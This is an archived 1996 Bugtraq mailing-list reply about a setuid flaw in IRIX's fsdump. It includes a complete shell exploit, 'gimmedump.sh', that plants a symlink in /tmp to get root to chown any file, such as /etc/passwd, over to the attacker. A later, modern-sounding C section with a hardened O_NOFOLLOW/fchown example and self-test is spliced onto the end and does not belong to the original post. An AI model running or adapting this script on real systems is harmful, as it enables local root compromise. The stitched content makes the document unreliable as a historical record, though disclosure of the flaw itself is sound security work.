[3725] in bugtraq


Re: Irix: more suid fun/exploits

daemon@ATHENA.MIT.EDU (Jaechul Choe)
Mon Dec 2 11:40:44 1996

Date: 	Tue, 3 Dec 1996 00:03:54 +0900
Reply-To: Jaechul Choe <poison@cosmos.kaist.ac.kr>
From: Jaechul Choe <poison@cosmos.kaist.ac.kr>
X-To:         volobuev@t1.chem.umn.edu
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <Pine.A41.3.95.961128044315.13692A-100000@t1.chem.umn.edu> from
              "Yuri Volobuev" at Nov 28, 96 05:55:38 am

> ABSTRACT
>
> /var/rfindd/fsdump is owned by root, has suid bit set by default and has
> bugs.  It allows local users to create zero-length files anywhere on the
> system.  If the file already exists, content is lost.  With little work, it
> can be converted to root compromise. 5.3 is affected, 6.2 doesn't seem to
> have it, at least not on a standard installation.
>

By exploiting fsdump just once you can change the owner of any file
to yourself. Didn't you see that the program changes the owner of the .pag & .dir
files to the user running it?
I found the bug several weeks ago and am now posting a lame exploit script
that had been put aside.

IRIX 6.2's fsdump was vulnerable as well. Is it safe from the zero-length
.lock file creation?

-------)<--------------------------------------------------------)<-------
#!/bin/sh
# gimmedump.sh
#
# This exploits the serious vulnerability in IRIX's fsdump(1M) program
# and attempts to change the owner of an arbitrary file to yourself.
# (You know /etc/passwd is an excellent target.)
# Tested on both IRIX 5.3 and IRIX64 6.2
# I think this bug may be exploited on any version of IRIX machines
# currently running.
# Here are some system call traces on the program, which show what
# the problem is:
#
#  379mS getuid() = 1128 euid=0
#  379mS getuid() = 1128 euid=0
#  379mS getuid() = 1128 euid=0
#  379mS getgid() = 20 egid=20
#  379mS chdir(/usr/var/tmp/) OK
#  380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
#  380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
#  380mS chmod(fsdump.pag, 0644) OK
#  380mS chown(fsdump.pag, 1128, 20) OK
#  380mS chmod(fsdump.dir, 0644) OK
#  381mS chown(fsdump.dir, 1128, 20) OK
#
# 1996 10.23    Jaechul Choe, CS Dept. in KAIST, Republic of Korea
#               poison@worak.kaist.ac.kr

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

if [ ! -f /var/rfindd/fsdump ]; then
        echo "fsdump doesn't exist! - exiting"
        exit 1
fi

cd /tmp
# fsdump chown()s /tmp/fsdump.dir by name, so a symlink under that name
# redirects the chown to the target given on the command line.
ln -s "$1" fsdump.dir
echo "Be patient! It will take some time to run."
echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
/var/rfindd/fsdump -Fgimme /
echo "\nDone. Here is the result."
ls -al "$1"
rm -f fsdump.dir fsdump.pag gimme
exit 0
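The trace in the script's header shows the root cause: fsdump chmod()s and chown()s its output files by name in a directory the caller controls, so a symlink planted under that name redirects root's chown to any file. Below is an added example, not fsdump's source or anything from this post, of the hardened pattern a setuid program should use instead: open the file with O_NOFOLLOW, validate the descriptor (regular file, single link, expected owner), then fchmod/fchown the descriptor rather than the name. The function and file names are hypothetical, and the demo constructs its own files under /tmp.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Fix mode/owner of a file the privileged program created itself, without
 * trusting the path. Returns 0, or -1 with errno: ELOOP if a symlink was
 * planted at `path`, EPERM if it is a hard link or not owned by `creator`. */
int fix_dumpfile_perms(const char *path, uid_t creator,
                       uid_t uid, gid_t gid, mode_t mode)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY); /* no symlinks */
    if (fd < 0) return -1;                    /* errno == ELOOP on a symlink */
    struct stat st; int err = 0;
    if (fstat(fd, &st) < 0)
        err = errno;
    else if (!S_ISREG(st.st_mode) || st.st_nlink != 1 || st.st_uid != creator)
        err = EPERM;                          /* hard link or foreign file */
    else if (fchmod(fd, mode) < 0 || fchown(fd, uid, gid) < 0)
        err = errno;                          /* act on the fd, not the name */
    close(fd);
    if (err) { errno = err; return -1; }
    return 0;
}

/* Self-check on constructed files: plant a symlink named fsdump.dir, as the
 * script above does, and confirm it is rejected while the real file is
 * still fixed up. Returns 1 when both behave as expected. */
int demo(void)
{
    char dir[] = "/tmp/fsdumpXXXXXX", target[64], lnk[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/fsdump.dir", dir);
    uid_t me = getuid(); gid_t mg = getgid();
    int ok = 0, fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 && close(fd) == 0 && symlink(target, lnk) == 0) {
        int bad = fix_dumpfile_perms(lnk, me, me, mg, 0644), e = errno;
        int good = fix_dumpfile_perms(target, me, me, mg, 0644);
        struct stat st;
        ok = bad == -1 && e == ELOOP && good == 0
             && stat(target, &st) == 0 && (st.st_mode & 0777) == 0644;
    }
    unlink(lnk); unlink(target); rmdir(dir);
    return ok;
}
```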
